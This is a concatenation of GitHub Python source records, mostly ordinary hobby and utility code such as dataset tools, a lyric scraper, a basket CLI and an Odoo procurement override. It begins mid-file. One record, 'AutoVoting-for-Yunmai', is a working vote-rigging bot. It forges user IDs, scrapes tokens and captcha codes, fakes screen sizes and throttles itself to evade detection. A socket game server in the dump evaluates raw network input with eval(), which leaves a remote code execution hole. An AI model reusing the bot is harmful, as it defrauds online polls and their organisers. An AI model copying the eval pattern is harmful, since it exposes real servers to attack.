later.\n btc = BTC.BeatTimeConverter(sm.offset, sm.bpms, sm.stops)\n\n # Will want to mantain order.\n # List of strings, not ints.\n diffs = list(filter(lambda x: x != 'Edit', sm.note_charts.keys()))\n if drop_diffs is not None:\n diffs = list(filter(lambda x: x not in drop_diffs, diffs))\n\n notes = {} # Contains only a list of notes for each difficulty.\n times = {} # List of times per diff.\n frames = {}\n # labels = {} # List of note aligned labels for note events. {0, 1} for now.\n\n\n # Track first and last notes for wav padding.\n first_frame = np.inf\n last_frame = -np.inf\n\n # Find note times and frames for alignment to features.\n for diff in diffs:\n times[diff], notes[diff] = \\\n btc.gen_time_notes(sm.note_charts[diff].notes)\n\n frames[diff] = btc.align_to_frame(times[diff])\n\n if frames[diff][0] < first_frame:\n first_frame = frames[diff][0]\n if frames[diff][-1] > last_frame:\n last_frame = frames[diff][-1]\n\n # Test this!\n # Test by writing beeps again.\n front_pad_frames, padded_wav = \\\n wavutils.pad_wav(first_frame, last_frame, sm.wavdata)\n\n fft_features = wavutils.gen_fft_features(padded_wav, log=log)\n\n # N_channels = 3 (1024, 2048, 4096)\n # N_frames ~ song length * 44100 / 512\n # N_freqs = 80 (Number of mel coefs per frame)\n N_channels, N_frames, N_freqs = fft_features.shape\n\n step_pos_labels = np.zeros((len(diffs), N_frames))\n step_type_labels = np.zeros((len(diffs), N_frames, 4))\n for i, diff in enumerate(diffs):\n # Adjusting for the new frames added on to the front.\n frames[diff] += front_pad_frames\n\n # Generating final frame-aligned labels for note event:\n step_pos_labels[i, frames[diff]] = 1\n\n\n for j, note in zip(frames[diff], notes[diff]):\n step_type_labels[i, j, :] = np.array(list(map(int, note)))\n\n\n return SMDataset.SMDataset(\n song_name, diffs, fft_features, step_pos_labels, step_type_labels,\n chunk_size, context_size)\n","repo_name":"Vivoe/DeepSM","sub_path":"deepSM/SMDUtils.py","file_name":"SMDUtils.py","file_ext":"py","file_size_in_byte":8848,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"14903596589","text":"import numpy as np \nimport pandas as pd \n\nLOG_DIR = 'logs/'\nenv_list = ['AtlantisNoFrameskip', 'BattleZoneNoFrameskip', 'BreakoutNoFrameskip', 'PongNoFrameskip', 'QbertNoFrameskip', 'SkiingNoFrameskip', \n 'VentureNoFrameskip', 'ZaxxonNoFrameskip']\nsetting = 'LR1e-2|HT=0.0|Pop=128|STD=0.02|Linear|LR=0.01|'\nsetting = 'LR1e-2|HT=0.0|Pop=128|STD=0.02|MLP|'\n\nfor env in env_list:\n file_name = LOG_DIR + setting + '_' + env + '-v4_seed0.csv'\n data = pd.read_csv(file_name)[-10:]\n print(env, data['mean_reward'].mean())","repo_name":"cangcn/NES-HT","sub_path":"print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17248765404","text":"import thClient as thnw\nimport usbDev as thlocal\nimport socket\nimport json\nimport sys\n\nfrom uiGlobals import *\n\ndef SetDeviceControl(top):\n \"\"\"\n set a device control through serial or Netwotk\n Args:\n top:The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n Return:\n None\n \"\"\" \n if top.myrole['uc'] == True:\n if top.myrole['thc'] == True:\n top.thCtrl = \"local\"\n else:\n top.thCtrl = \"network\"\n\n\ndef ResetDeviceControl(top):\n \"\"\"\n Reset the device\n Args:\n top:The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n Return:\n None \n \"\"\"\n if top.hcclient != None:\n top.clienthc.close()\n top.hcclient.close()\n\ndef get_tree_change(top):\n \"\"\"\n get the device tree change info throgh network\n Args:\n self:The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n Return:\n None\n\n \"\"\"\n if top.thCtrl == \"local\":\n if sys.platform.startswith(\"win\"):\n updtu4list = thlocal.get_usbandusb4_tree()\n if len(top.masterList) == 0:\n for dev in updtu4list:\n top.masterList.append(dev)\n thlocal.get_u4_tree_change(top, updtu4list)\n top.save_usb_list(updtu4list)\n\n else:\n dl, newlist = thlocal.get_usb_tree()\n thlocal.get_tree_change(top, dl, newlist)\n \n if sys.platform == \"darwin\":\n newdict = thlocal.get_tb_tree()\n thlocal.get_tb_tree_change(top, newdict)\n\n elif top.thCtrl == \"network\":\n resdict = thnw.get_usb_tree(top.ldata['thcid'],\n int(top.ldata['sthcpn']))\n if resdict[\"result\"][0][\"status\"] == \"OK\":\n findict = resdict[\"result\"][1][\"data\"]\n if findict[0] == -1:\n top.device_no_response()\n return\n thlocal.get_tree_change(top, findict[0], findict[1]) \n else:\n top.print_on_log(\"TH Computer Connection Fail!\\n\")\n top.device_no_response() ","repo_name":"mcci-usb/Cricket","sub_path":"src/thControl.py","file_name":"thControl.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"11694999473","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module reads the image array in, uses MTCNN to crop the image, resize the cropped image back to 48x48 and saves it\nas .npy file for numpy loading if necessary.\n\"\"\"\nimport csv\nimport numpy as np\nfrom data_processing import crop_face_single\nfrom utils import emotion_int_to_str\n\nDATA_DIR = \"../data/icml_face_data.csv\"\n\nTRAIN_LABEL = \"Training\"\nPUB_TEST_LABEL = \"PublicTest\"\nPRI_TEST_LABEL = \"PrivateTest\"\n\nx_train = []\nx_test = []\nx_valid = []\ny_train = []\ny_test = []\ny_valid = []\n\n\nwith open(DATA_DIR, \"r\") as f:\n reader = csv.reader(f, delimiter=\",\")\n reader.__next__()\n for line in reader:\n emotion_int = int(line[0])\n emotion_str = emotion_int_to_str(emotion_int)\n purpose = line[1]\n pixel_array = line[2].split(' ')\n pixel_array = np.array(list(map(int, pixel_array)), dtype=np.uint8)\n pixel_array = np.reshape(pixel_array, (-1, 48))\n\n pixel_array_cropped = crop_face_single(pixel_array, resize=True)\n\n if purpose == TRAIN_LABEL:\n x_train.append(pixel_array_cropped)\n y_train.append(emotion_int)\n elif purpose == PUB_TEST_LABEL:\n x_test.append(pixel_array_cropped)\n y_test.append(emotion_int)\n elif purpose == PRI_TEST_LABEL:\n x_valid.append(pixel_array_cropped)\n y_valid.append(emotion_int)\n\nx_train = np.asarray(x_train)\nx_test = np.asarray(x_test)\nx_valid = np.asarray(x_valid)\ny_train = np.asarray(y_train)\ny_test = np.asarray(y_test)\ny_valid = np.asarray(y_valid)\n\nnp.save('../data/processed_data/cropped/x_train.npy', x_train)\nnp.save('../data/processed_data/cropped/x_test.npy', x_test)\nnp.save('../data/processed_data/cropped/x_valid.npy', x_valid)\nnp.save('../data/processed_data/cropped/y_train.npy', y_train)\nnp.save('../data/processed_data/cropped/y_test.npy', y_test)\nnp.save('../data/processed_data/cropped/y_valid.npy', y_valid)","repo_name":"nnyy10/COMP90055_CNN_Emotion_Recognition","sub_path":"CNN/data_extraction/extract_cropped_img_data.py","file_name":"extract_cropped_img_data.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41538271038","text":"import socket\nfrom _thread import *\n\nserver_ip = \"\"\n\nserver = server_ip\nport = 5555\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.bind((server, port))\nexcept socket.error as e:\n str(e)\n\ns.listen(2)\nprint(\"Waiting for a connection, Server Started\")\n\nplayers = {}\n\ndef threaded_client(conn, player):\n global currentPlayer\n reply = \"\"\n while True:\n try:\n databit = conn.recv(2048)\n data = eval(databit.decode(\"utf-8\"))\n players[player] = data\n for p_index in players:\n if not players[p_index]:\n players.pop(p_index)\n reply = list(players.values())\n conn.send(str.encode(str(reply)))\n\n except:\n break\n\n print(\"Lost connection\")\n conn.close()\n\n\nglobal currentPlayer\ncurrentPlayer = 0\nwhile True:\n conn, addr = s.accept()\n print(\"Connected to:\", addr)\n start_new_thread(threaded_client, (conn, currentPlayer))\n currentPlayer += 1\n","repo_name":"fjaviergb/Pygames-Hermanios","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74783120805","text":"n,k=map(int,input().split())\r\na=dict()\r\nans =0\r\ncount=0\r\nfor i in range (n):\r\n b=int(input())\r\n if b in a :\r\n a[b]+=1\r\n else:\r\n a[b]=1\r\nfor key in a:\r\n if a[key]%2==0:\r\n ans+=a[key]\r\n a[key]=0\r\n else:\r\n ans+=(a[key]-1)\r\n a[key]=1\r\nfor key in a:\r\n if a[key]==1:\r\n count+=1\r\nif count%2==0:\r\n ans+=count//2\r\nelse:\r\n ans+=(count//2)+1\r\nprint(ans)\r\n\r\n","repo_name":"gurnish-singh/cf-problems-solved-","sub_path":"drinks choosing.py","file_name":"drinks choosing.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3854477990","text":"import csv\nimport numpy as np\nimport pandas as pd \nimport math\n\nif __name__ == '__main__':\n\n data1 = pd.read_csv(\"label.csv\")\n df1 = pd.DataFrame(data=data1)\n data2 = pd.read_csv(\"label2.csv\")\n df3 = pd.DataFrame(data=data2)\n df1 = df1.append(df3,ignore_index=True)\n\n\n df1 = df1.interpolate(method ='linear', axis=0)\n df2 = df1\n df1 = df1[df1.PLAYER_ID == 1]\n df2 = df2[df2.PLAYER_ID == 2]\n\n df2 = df2.sort_values(by=['class'])\n df1 = df1.sort_values(by=['class'])\n df1.to_csv(\"output_player1_after_interpolate.csv\", index = False)\n df2.to_csv(\"output_player2_after_interpolate.csv\", index = False)\n\n'''\n data1 = pd.read_csv(\"output.csv\")\n df1 = pd.DataFrame(data=data1)\n #df1 = df1.interpolate(method ='linear', axis=0)\n\n data2 = pd.read_csv(\"output2.csv\")\n df2 = pd.DataFrame(data=data2)\n df2 = df2.drop(df2.index[0:107880])\n #df2 = df2[df2.frame > 52248]\n \n #print(df2)\n\n df3 = df1.append(df2)\n df3.to_csv(\"final.csv\", index = False)\n''' \n\n","repo_name":"Raychen0617/POSE_RECOGNITION_BADMINTION-I","sub_path":"training_data_create_by_ray/CHEN_Long_CHOU_Tien_Chen_Denmark_Open_2019_QuarterFinal/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74446070565","text":"#coding = utf-8\n# by 'hollowman6' from Lanzhou University(兰州大学)\n'''\n说明:\n支持多线程投票\n如果想要用此系统为你自己投票,请记下你的投票网址host,参数中aid和id的值,并用浏览器编译模式(F12)的network项获取其它参数,在‘目标投票网页参数设置’处修改;\n如果系统长时间无输出响应,请检查投票网页参数是否设置正确,网络连接是否正常;\n如果总显示“投票失败”,请首先检查获取openid部分代码正确与否;\n如果还有问题,请先用试着真实投票,并同时用Fiddler抓包,了解其原理后再对代码进行具体修改。\n\nDescription:\nSupport Multithreading voting\nIf you want to use this system to vote for yourself, please remenber your voting URL host, the value of the aid and id , and use the network item of the compilation mode of browser (F12) to get other parameters, and modify it in the ‘Target voting page parameter setting’;\nIf the system has no output response for a long time, please check whether the voting page parameters are set correctly and the network connection is normal.\nIf the \"Falling Failure\" is always displayed, first check if the code for obtaining the openid part is correct or not;\nIf you still have problems, please try to vote in real time and use Fiddler to capture the package and understand the principle before modifying the code.\n '''\n\n# 载入相关库 Load related libraries\nimport requests\nimport re\nimport time\nimport random\n# 多线程 Multithreading\n# import threading\n\n# 初始化计数变量 Initialization count variable\ncount = 0\nind = False\n\n# 随机屏幕大小 Random Screen Size\nhlist = ['640', '800', '1024', '1400', '1600', '2048', '800', '1024', '1280',\n '1440', '1680', '1920', '2056', '960', '1280', '1366', '1920', '2560']\nwlist = ['480', '600', '768', '1050', '1200', '1536', '480', '600', '800',\n '900', '1050', '1200', '1600', '540', '720', '768', '1080', '1440']\n\n\ndef vote():\n global count, ind\n# 忽略过程中的网络错误 Ignore network errors during the process\n try:\n\n # 目标投票网页参数设置 Target voting page parameter setting\n host = \"http://www.citydating6.top\"\n aid = \"723\"\n id = \"41412\"\n url1 = host + \"/vote.php\"\n url2 = host + \"/api/createCode.php\"\n user = \"1\" + ''.join(random.sample('1234567890', 5))\n header1 = {\n \"User-Agent\":\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.691.400 QQBrowser/9.0.2524.400',\n \"Accept\":\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n \"Accept-Language\":\n 'zh-CN,zh;q=0.9'\n }\n cookies = {\"PHPSESSID\": 'n86ciil3u5n6a7257tmgced1d6', 'this_user': '1'}\n rtime = time.time()\n ptime = round(rtime)\n jtime = ''.join(random.sample('123456789', 3))\n post1 = {'time': ptime, 'j_time': jtime}\n\n # 获取随机生成用户的openid Get the openid of the randomly generated user\n html = requests.get(\n url=host + \"/activity_item1.php?aid=\" + aid + \"&id=\" + id +\n \"&userid=\" + user,\n headers=header1,\n cookies=cookies,\n verify=False)\n openid = ''.join(re.findall(r'var _xenon = \"(.+?)\";', html.text))\n\n # 获取验证码 get verification code\n header2 = {\n \"User-Agent\":\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.691.400 QQBrowser/9.0.2524.400',\n \"Referer\":\n host + \"/activity_item1.php?aid=\" + aid + \"&id=\" + id + \"&userid=\"\n + user + \"&orther_openid=\" + openid,\n \"Accept\":\n 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n \"Accept-Language\":\n 'zh-CN,zh;q=0.9'\n }\n code = requests.post(\n url=url2,\n data=post1,\n headers=header2,\n cookies=cookies,\n verify=False).text[-9:-2].replace(\",\", '')\n\n # 投票 Voting\n n = random.randint(0, 17)\n post2 = {\n 'aid': aid,\n \"width\": wlist[n],\n \"height\": hlist[n],\n 'id': id,\n 'wechatid': user,\n 'orther_id': openid,\n 'xenon': openid,\n 'code': code,\n 'p_time': ptime,\n 'j_time': jtime\n }\n vote = requests.post(\n url=url1,\n data=post2,\n headers=header2,\n cookies=cookies,\n verify=False).text[25]\n\n # 判断投票状态 Judging voting status\n if vote == '2':\n print(\"投票失败,可能程序此时使用的账号已经投过票。还将继续为您投票,请稍侯···\")\n # Translation: The vote failed. the account used by the program at this time may have voted. The program will continue to vote for you, please wait...\n elif vote == '0':\n count += 1\n print(\"恭喜您,投票成功,此程序已经为您投票{:}次!\".format(count))\n # Translation: Congratulations! the vote is successful, this program has already voted for you {:} times!\n elif vote == '3':\n print(\"投票速度过快,已被系统禁止投票,请稍后再试!\")\n # Translation: The voting speed is too fast and has been banned from voting by the system. Please try again later!\n ind = True\n elif vote == '4':\n print(\"验证码错误!请检查获取验证码部分代码!\")\n # Translation: Verification code error! Please check the code of getting the verification code!\n ind = True\n else:\n print(\"抱歉,现在不能投票!\")\n # Translation: Sorry, can't vote now!\n ind = True\n '''\n threadmax.release()\n '''\n\n # 设置每次投票间隔时间(可选) Set the interval between each vote (optional)\n time.sleep(random.normalvariate(13.5, 3))\n\n except Exception:\n print(\"程序出错!\")\n '''\n threadmax.release()\n '''\n\n\n'''\n# 使用多线程(可选) Using multithreading(optional)\n\n# 限制线程的最大数量为32个 The maximum number of restricted threads is 32\nthreadmax = threading.BoundedSemaphore(128)\n\nl = []\nwhile True:\n if ind==True:\n break\n # 增加信号量,可用信号量减一 Increase the semaphore and subtract one from the semaphore\n threadmax.acquire()\n t = threading.Thread(target=vote)\n t.start()\n l.append(t)\n for t in l:\n t.join()\n'''\nwhile True:\n if ind == True:\n break\n vote()\n# 要使用多线程投票,请将121-147行的'''删去,并将此注释上一行的vote()也删去\n# To use multithreaded voting, delete'''in lines 122-148 and vote () in the previous line of this comment\n","repo_name":"HollowMan6/AutoVoting-for-Yunmai","sub_path":"AutoVoting-for-Yunmai.py","file_name":"AutoVoting-for-Yunmai.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"38806923135","text":"import pickle\nimport os.path\n\n# ask the user to select an item\n# the user can:\n# - \"add\" an item to the list\n# - \"show\" the list of items\n# - \"count\" to print the items count\n# - \"remove\" the last item from the list\n# - \"clear\" the list\n\n# - * for the \"show\" command, the output should print the description, and the price also\n# - * \"total\" to show the total to be paid\n# - * \"add_to_stock\" ask the user for the name, description and price\n# - * \"stock\" to list all available in stocks\n# - * validate before \"remove\" item\n# - * validate before \"clear\"\n# - * on \"show\" show a message if the basket is empty\n# - * save the stock in file on exit\n# - * save the basket in file on exit\n# - * restore the stock from file on start\n# - * restore the basket from file on start\n\n\nstock = {\n 'cola': 5000,\n 'pepsi': 10000,\n 'sugar': 6000,\n}\n\nstock_description = {\n 'cola': 'Coca Cola',\n 'pepsi': 'Pepsi 200ml',\n 'sugar': '500g'\n}\n\nbasket = []\n\nis_running = True\n\nif os.path.exists(\"basket.data\"):\n print(\"loading the basket from basket.data\")\n with open(\"basket.data\", \"rb\") as basket_file:\n basket = pickle.load(basket_file)\n\nif os.path.exists(\"stock.data\"):\n print(\"loading the stock from stock.data\")\n with open(\"stock.data\", \"rb\") as stock_file:\n stock = pickle.load(stock_file)\n\nif os.path.exists(\"stock_description.data\"):\n print(\"loading the stock from stock_description.data\")\n with open(\"stock_description.data\", \"rb\") as stock_description_file:\n stock_description = pickle.load(stock_description_file)\n\n\nwhile is_running:\n\n command = input(\"Select a command (add, show, show_item, count, remove, clear, add_to_stock, stock, exit): \")\n\n if command == \"add\":\n item = input(\"Please enter the item name: \")\n\n if item in stock:\n basket.append(item)\n else:\n print(item, \"does not exist in the stock!\")\n print(\"Available items:\")\n for key, price in stock.items():\n print(f\"{key}: {price}\")\n\n elif command == \"show\":\n if len(basket) == 0:\n print(\"No items in your basket.\")\n else:\n for i, item in enumerate(basket):\n print(f\"{i}: {item}\", stock[item], stock_description[item])\n\n elif command == \"show_item\":\n index = int(input(\"Please enter the item index: \"))\n print(basket[index])\n\n elif command == \"count\":\n print(\"You have\", len(basket), \"items.\")\n\n elif command == \"remove\":\n if len(basket) > 0:\n remove_item = basket.pop()\n print(\"Removing last item:\", remove_item)\n else:\n print(\"Basket already empty\")\n\n elif command == \"clear\":\n if len(basket) > 0:\n basket.clear()\n print(\"Basket is empty now\")\n else:\n print(\"Basket already empty\")\n\n elif command == \"total\":\n total = 0\n for item in basket:\n price = stock[item]\n total = price + total\n\n print(\"The total is:\", total)\n\n elif command == \"add_to_stock\":\n name = input(\"Enter the name: \")\n description = input(\"Enter the description: \")\n price = float(input(\"Enter the price: \"))\n\n stock[name] = price\n stock_description[name] = description\n\n print(\"Item\", name, \"is added to the stock\")\n\n elif command == \"stock\":\n print(\"Available items:\")\n for key, price in stock.items():\n print(f\"{key}: {price}\", stock_description[key])\n\n elif command == \"exit\":\n\n print(\"saving the basket into basket.data\")\n with open(\"basket.data\", \"wb\") as basket_file:\n pickle.dump(basket, basket_file)\n\n print(\"saving the stock into stock.data\")\n with open(\"stock.data\", \"wb\") as stock_file:\n pickle.dump(stock, stock_file)\n\n print(\"saving the stock into stock_description.data\")\n with open(\"stock_description.data\", \"wb\") as stock_description_file:\n pickle.dump(stock_description, stock_description_file)\n\n print(\"Bye bye!\")\n is_running = False\n\n else:\n print(\"Unknown command\", command)\n","repo_name":"ahmad-moussawi/python-exercices","sub_path":"list_basket.py","file_name":"list_basket.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27602438386","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# adapted from: https://bigishdata.com/2016/09/27/getting-song-lyrics-from-geniuss-api-scraping/\n# to find the artist ID, go to https://docs.genius.com/#/authentication-h1\n# and search for a song by that artist, then find the \"id\" tag in the results\nimport sys\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nsys.path.append('C:\\PythonProjects\\PythonUtilities')\nimport CFGFileHelper\n\ncfgpath = 'C:\\PythonProjects\\Private\\lyricgeniuscredentials.ini'\ncredentialdict = CFGFileHelper.read(cfgpath,'credentials')\n\nbase_url = \"http://api.genius.com\"\ntoken = 'Bearer '+ credentialdict['client_access_token']\nheaders = {'Authorization': token}\n\n# the national\nartist_id = '658'\nfilename = \"thenational2.txt\"\n\n#tom petty\nartist_id = '67932'\nfilename = \"tompetty.txt\"\n\ndef lyrics_from_song_api_path(song_api_path):\n song_url = base_url + song_api_path\n response = requests.get(song_url, headers=headers)\n json = response.json()\n path = json[\"response\"][\"song\"][\"path\"]\n #gotta go regular html scraping... come on Genius\n page_url = \"https://genius.com\" + path\n page = requests.get(page_url)\n html = BeautifulSoup(page.text, \"html.parser\")\n #remove script tags that they put in the middle of the lyrics\n [h.extract() for h in html('script')]\n #at least Genius is nice and has a tag called 'lyrics'!\n lyrics = html.find(\"div\", class_=\"lyrics\").get_text() #updated css where the lyrics are based in HTML\n lyrics.replace('\\n', ' ')\n return lyrics\n\n\n\ndef pull_lyrics():\n with open(filename, \"w\", encoding=\"utf-8\") as outfile:\n nextpage = 1\n while nextpage != None:\n print(\"Downloading page \"+str(nextpage))\n url = base_url + \"/artists/\"+artist_id+ \"/songs?per_page=50&page=\"+str(nextpage)\n response = requests.get(url, headers=headers)\n json = response.json()\n nextpage = json[\"response\"][\"next_page\"]\n for song in json[\"response\"][\"songs\"]:\n print(song[\"title\"]+\" by \"+song[\"primary_artist\"][\"name\"])\n song_api_path = song[\"api_path\"]\n lyrics = lyrics_from_song_api_path(song_api_path)\n outfile.write(lyrics)\n outfile.Close()\n\nif __name__ == \"__main__\":\n pull_lyrics()\n\n\n","repo_name":"Furricane/LyricWebScraper","sub_path":"LyricWebScraper.py","file_name":"LyricWebScraper.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21740279916","text":"from datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom openerp import SUPERUSER_ID\nfrom openerp.osv import fields, osv\nfrom openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP\nfrom openerp.tools.translate import _\n\nimport re\n\nclass procurement_order(osv.osv):\n \n def create_procurement_purchase_order(self, cr, uid, procurement, po_vals, line_vals, context=None):\n sale_line = procurement.sale_line_id\n if sale_line:\n po_vals[\"sale_order_id\"]=sale_line.order_id.id \n return super(procurement_order,self).create_procurement_purchase_order(cr, uid, procurement, po_vals, line_vals, context=context)\n \n def _get_po_line_values_from_proc(self, cr, uid, procurement, partner, company, schedule_date, context=None):\n res = super(procurement_order, self)._get_po_line_values_from_proc(cr, uid, procurement, partner, company, schedule_date, context=context)\n sale_line = procurement.sale_line_id\n if sale_line:\n # set sale line \n res[\"sale_line_id\"] = sale_line.id\n \n # TODO is not for all a good solution\n # res[\"name\"] = sale_line.name\n \n # procurement info note NOT added\n # because for example sale_purchase_quotation add procurement\n # info directly to purchase order\n # if needed an extra module sale_purchase_note should added\n \n # add analytic account\n analytic_account = sale_line.order_id.project_id\n if analytic_account: \n res[\"account_analytic_id\"]=analytic_account.id\n \n return res\n \n def make_po(self, cr, uid, ids, context=None):\n \"\"\" Resolve the purchase from procurement, which may result in a new PO creation, a new PO line creation or a quantity change on existing PO line.\n Note that some operations (as the PO creation) are made as SUPERUSER because the current user may not have rights to do it (mto product launched by a sale for example)\n\n @return: dictionary giving for each procurement its related resolving PO line.\n \"\"\"\n res = {}\n company = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id\n po_obj = self.pool.get('purchase.order')\n po_line_obj = self.pool.get('purchase.order.line')\n seq_obj = self.pool.get('ir.sequence')\n pass_ids = []\n linked_po_ids = []\n sum_po_line_ids = []\n for procurement in self.browse(cr, uid, ids, context=context):\n ctx_company = dict(context or {}, force_company=procurement.company_id.id)\n partner = self._get_product_supplier(cr, uid, procurement, context=ctx_company)\n if not partner:\n self.message_post(cr, uid, [procurement.id], _('There is no supplier associated to product %s') % (procurement.product_id.name))\n res[procurement.id] = False\n else:\n schedule_date = self._get_purchase_schedule_date(cr, uid, procurement, company, context=context)\n purchase_date = self._get_purchase_order_date(cr, uid, procurement, company, schedule_date, context=context) \n line_vals = self._get_po_line_values_from_proc(cr, uid, procurement, partner, company, schedule_date, context=ctx_company)\n #look for any other draft PO for the same supplier, to attach the new line on instead of creating a new draft one\n available_draft_po_ids = po_obj.search(cr, uid, [\n ('partner_id', '=', partner.id), ('state', '=', 'draft'), ('picking_type_id', '=', procurement.rule_id.picking_type_id.id),\n ('location_id', '=', procurement.location_id.id), ('company_id', '=', procurement.company_id.id), ('dest_address_id', '=', procurement.partner_dest_id.id)], context=context)\n if available_draft_po_ids: \n \n po_id = available_draft_po_ids[0]\n po_rec = po_obj.browse(cr, uid, po_id, context=context)\n\n # crate new origin\n po_origins = set(self._re_split_po_origin.split(po_rec.origin or \"\")) \n po_origins |= set(self._re_split_po_origin.split(procurement.origin or \"\"))\n po_origins = list(po_origins)\n po_origins.sort() \n po_to_update = {'origin': ', '.join(po_origins)}\n \n #if the product has to be ordered earlier those in the existing PO, we replace the purchase date on the order to avoid ordering it too late\n if datetime.strptime(po_rec.date_order, DEFAULT_SERVER_DATETIME_FORMAT) > purchase_date:\n po_to_update.update({'date_order': purchase_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT)})\n po_obj.write(cr, uid, [po_id], po_to_update, context=context)\n #look for any other PO line in the selected PO with same product and UoM to sum quantities instead of creating a new po line\n available_po_line_ids = po_line_obj.search(cr, uid, [('order_id', '=', po_id), ('product_id', '=', line_vals['product_id']), ('product_uom', '=', line_vals['product_uom']), ('sale_line_id', '=', line_vals.get('sale_line_id',False))], context=context)\n if available_po_line_ids:\n po_line = po_line_obj.browse(cr, uid, available_po_line_ids[0], context=context)\n po_line_id = po_line.id\n new_qty, new_price = self._calc_new_qty_price(cr, uid, procurement, po_line=po_line, context=context)\n\n if new_qty > po_line.product_qty:\n po_line_obj.write(cr, SUPERUSER_ID, po_line.id, {'product_qty': new_qty, 'price_unit': new_price}, context=context)\n self.update_origin_po(cr, uid, po_rec, procurement, context=context)\n sum_po_line_ids.append(procurement.id)\n else:\n line_vals.update(order_id=po_id)\n po_line_id = po_line_obj.create(cr, SUPERUSER_ID, line_vals, context=context)\n linked_po_ids.append(procurement.id)\n else:\n name = seq_obj.get(cr, uid, 'purchase.order', context=context) or _('PO: %s') % procurement.name\n po_vals = {\n 'name': name,\n 'origin': procurement.origin,\n 'partner_id': partner.id,\n 'location_id': procurement.location_id.id,\n 'picking_type_id': procurement.rule_id.picking_type_id.id,\n 'pricelist_id': partner.property_product_pricelist_purchase.id,\n 'currency_id': partner.property_product_pricelist_purchase and partner.property_product_pricelist_purchase.currency_id.id or procurement.company_id.currency_id.id,\n 'date_order': purchase_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT),\n 'company_id': procurement.company_id.id,\n 'fiscal_position': po_obj.onchange_partner_id(cr, uid, None, partner.id, context=dict(context, company_id=procurement.company_id.id))['value']['fiscal_position'],\n 'payment_term_id': partner.property_supplier_payment_term.id or False,\n 'dest_address_id': procurement.partner_dest_id.id,\n }\n po_id = self.create_procurement_purchase_order(cr, SUPERUSER_ID, procurement, po_vals, line_vals, context=dict(context, company_id=po_vals['company_id']))\n po_line_id = po_obj.browse(cr, uid, po_id, context=context).order_line[0].id\n pass_ids.append(procurement.id)\n res[procurement.id] = po_line_id\n self.write(cr, uid, [procurement.id], {'purchase_line_id': po_line_id}, context=context)\n if pass_ids:\n self.message_post(cr, uid, pass_ids, body=_(\"Draft Purchase Order created\"), context=context)\n if linked_po_ids:\n self.message_post(cr, uid, linked_po_ids, body=_(\"Purchase line created and linked to an existing Purchase Order\"), context=context)\n if sum_po_line_ids:\n self.message_post(cr, uid, sum_po_line_ids, body=_(\"Quantity added in existing Purchase Order Line\"), context=context)\n return res\n \n _inherit = \"procurement.order\"\n _re_split_po_origin = re.compile(\"[,]\\s*\")\n","repo_name":"funkring/fdoo","sub_path":"addons-funkring/at_purchase_sale/procurement.py","file_name":"procurement.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"462455418","text":"# -*- coding, utf-8 -*-\n\"\"\"\nCreated on Mon Jun 25 16,32,12 2018\n\n@author, Ragini\n\"\"\"\n\n# Week 1, Class 1 Qns to do\n\n#Qn 1, Fizzbuzz Qns\n\ndef fizzbuzz():\n new_list = []\n for i in range(1,101):\n if i%3 == 0 and i%5 == 0:\n new_list.append(\"Fizzbuzz\")\n elif i%3 == 0:\n new_list.append(\"Fizz\")\n elif i%5 == 0:\n new_list.append(\"Buzz\")\n else:\n new_list.append(i)\n return new_list\nfizzbuzz()\n\n#Qn 2, Integer to Roman Numerals\n\n#Create a reference table for the roman numerals against the integers \nroman_numeral_table = [(\"M\", 1000), (\"CM\", 900), (\"D\", 500), (\"CD\", 400), (\"C\", 100), (\"XC\", 90), \n (\"L\", 50), (\"LC\", 40), (\"X\", 10), (\"IX\", 9), 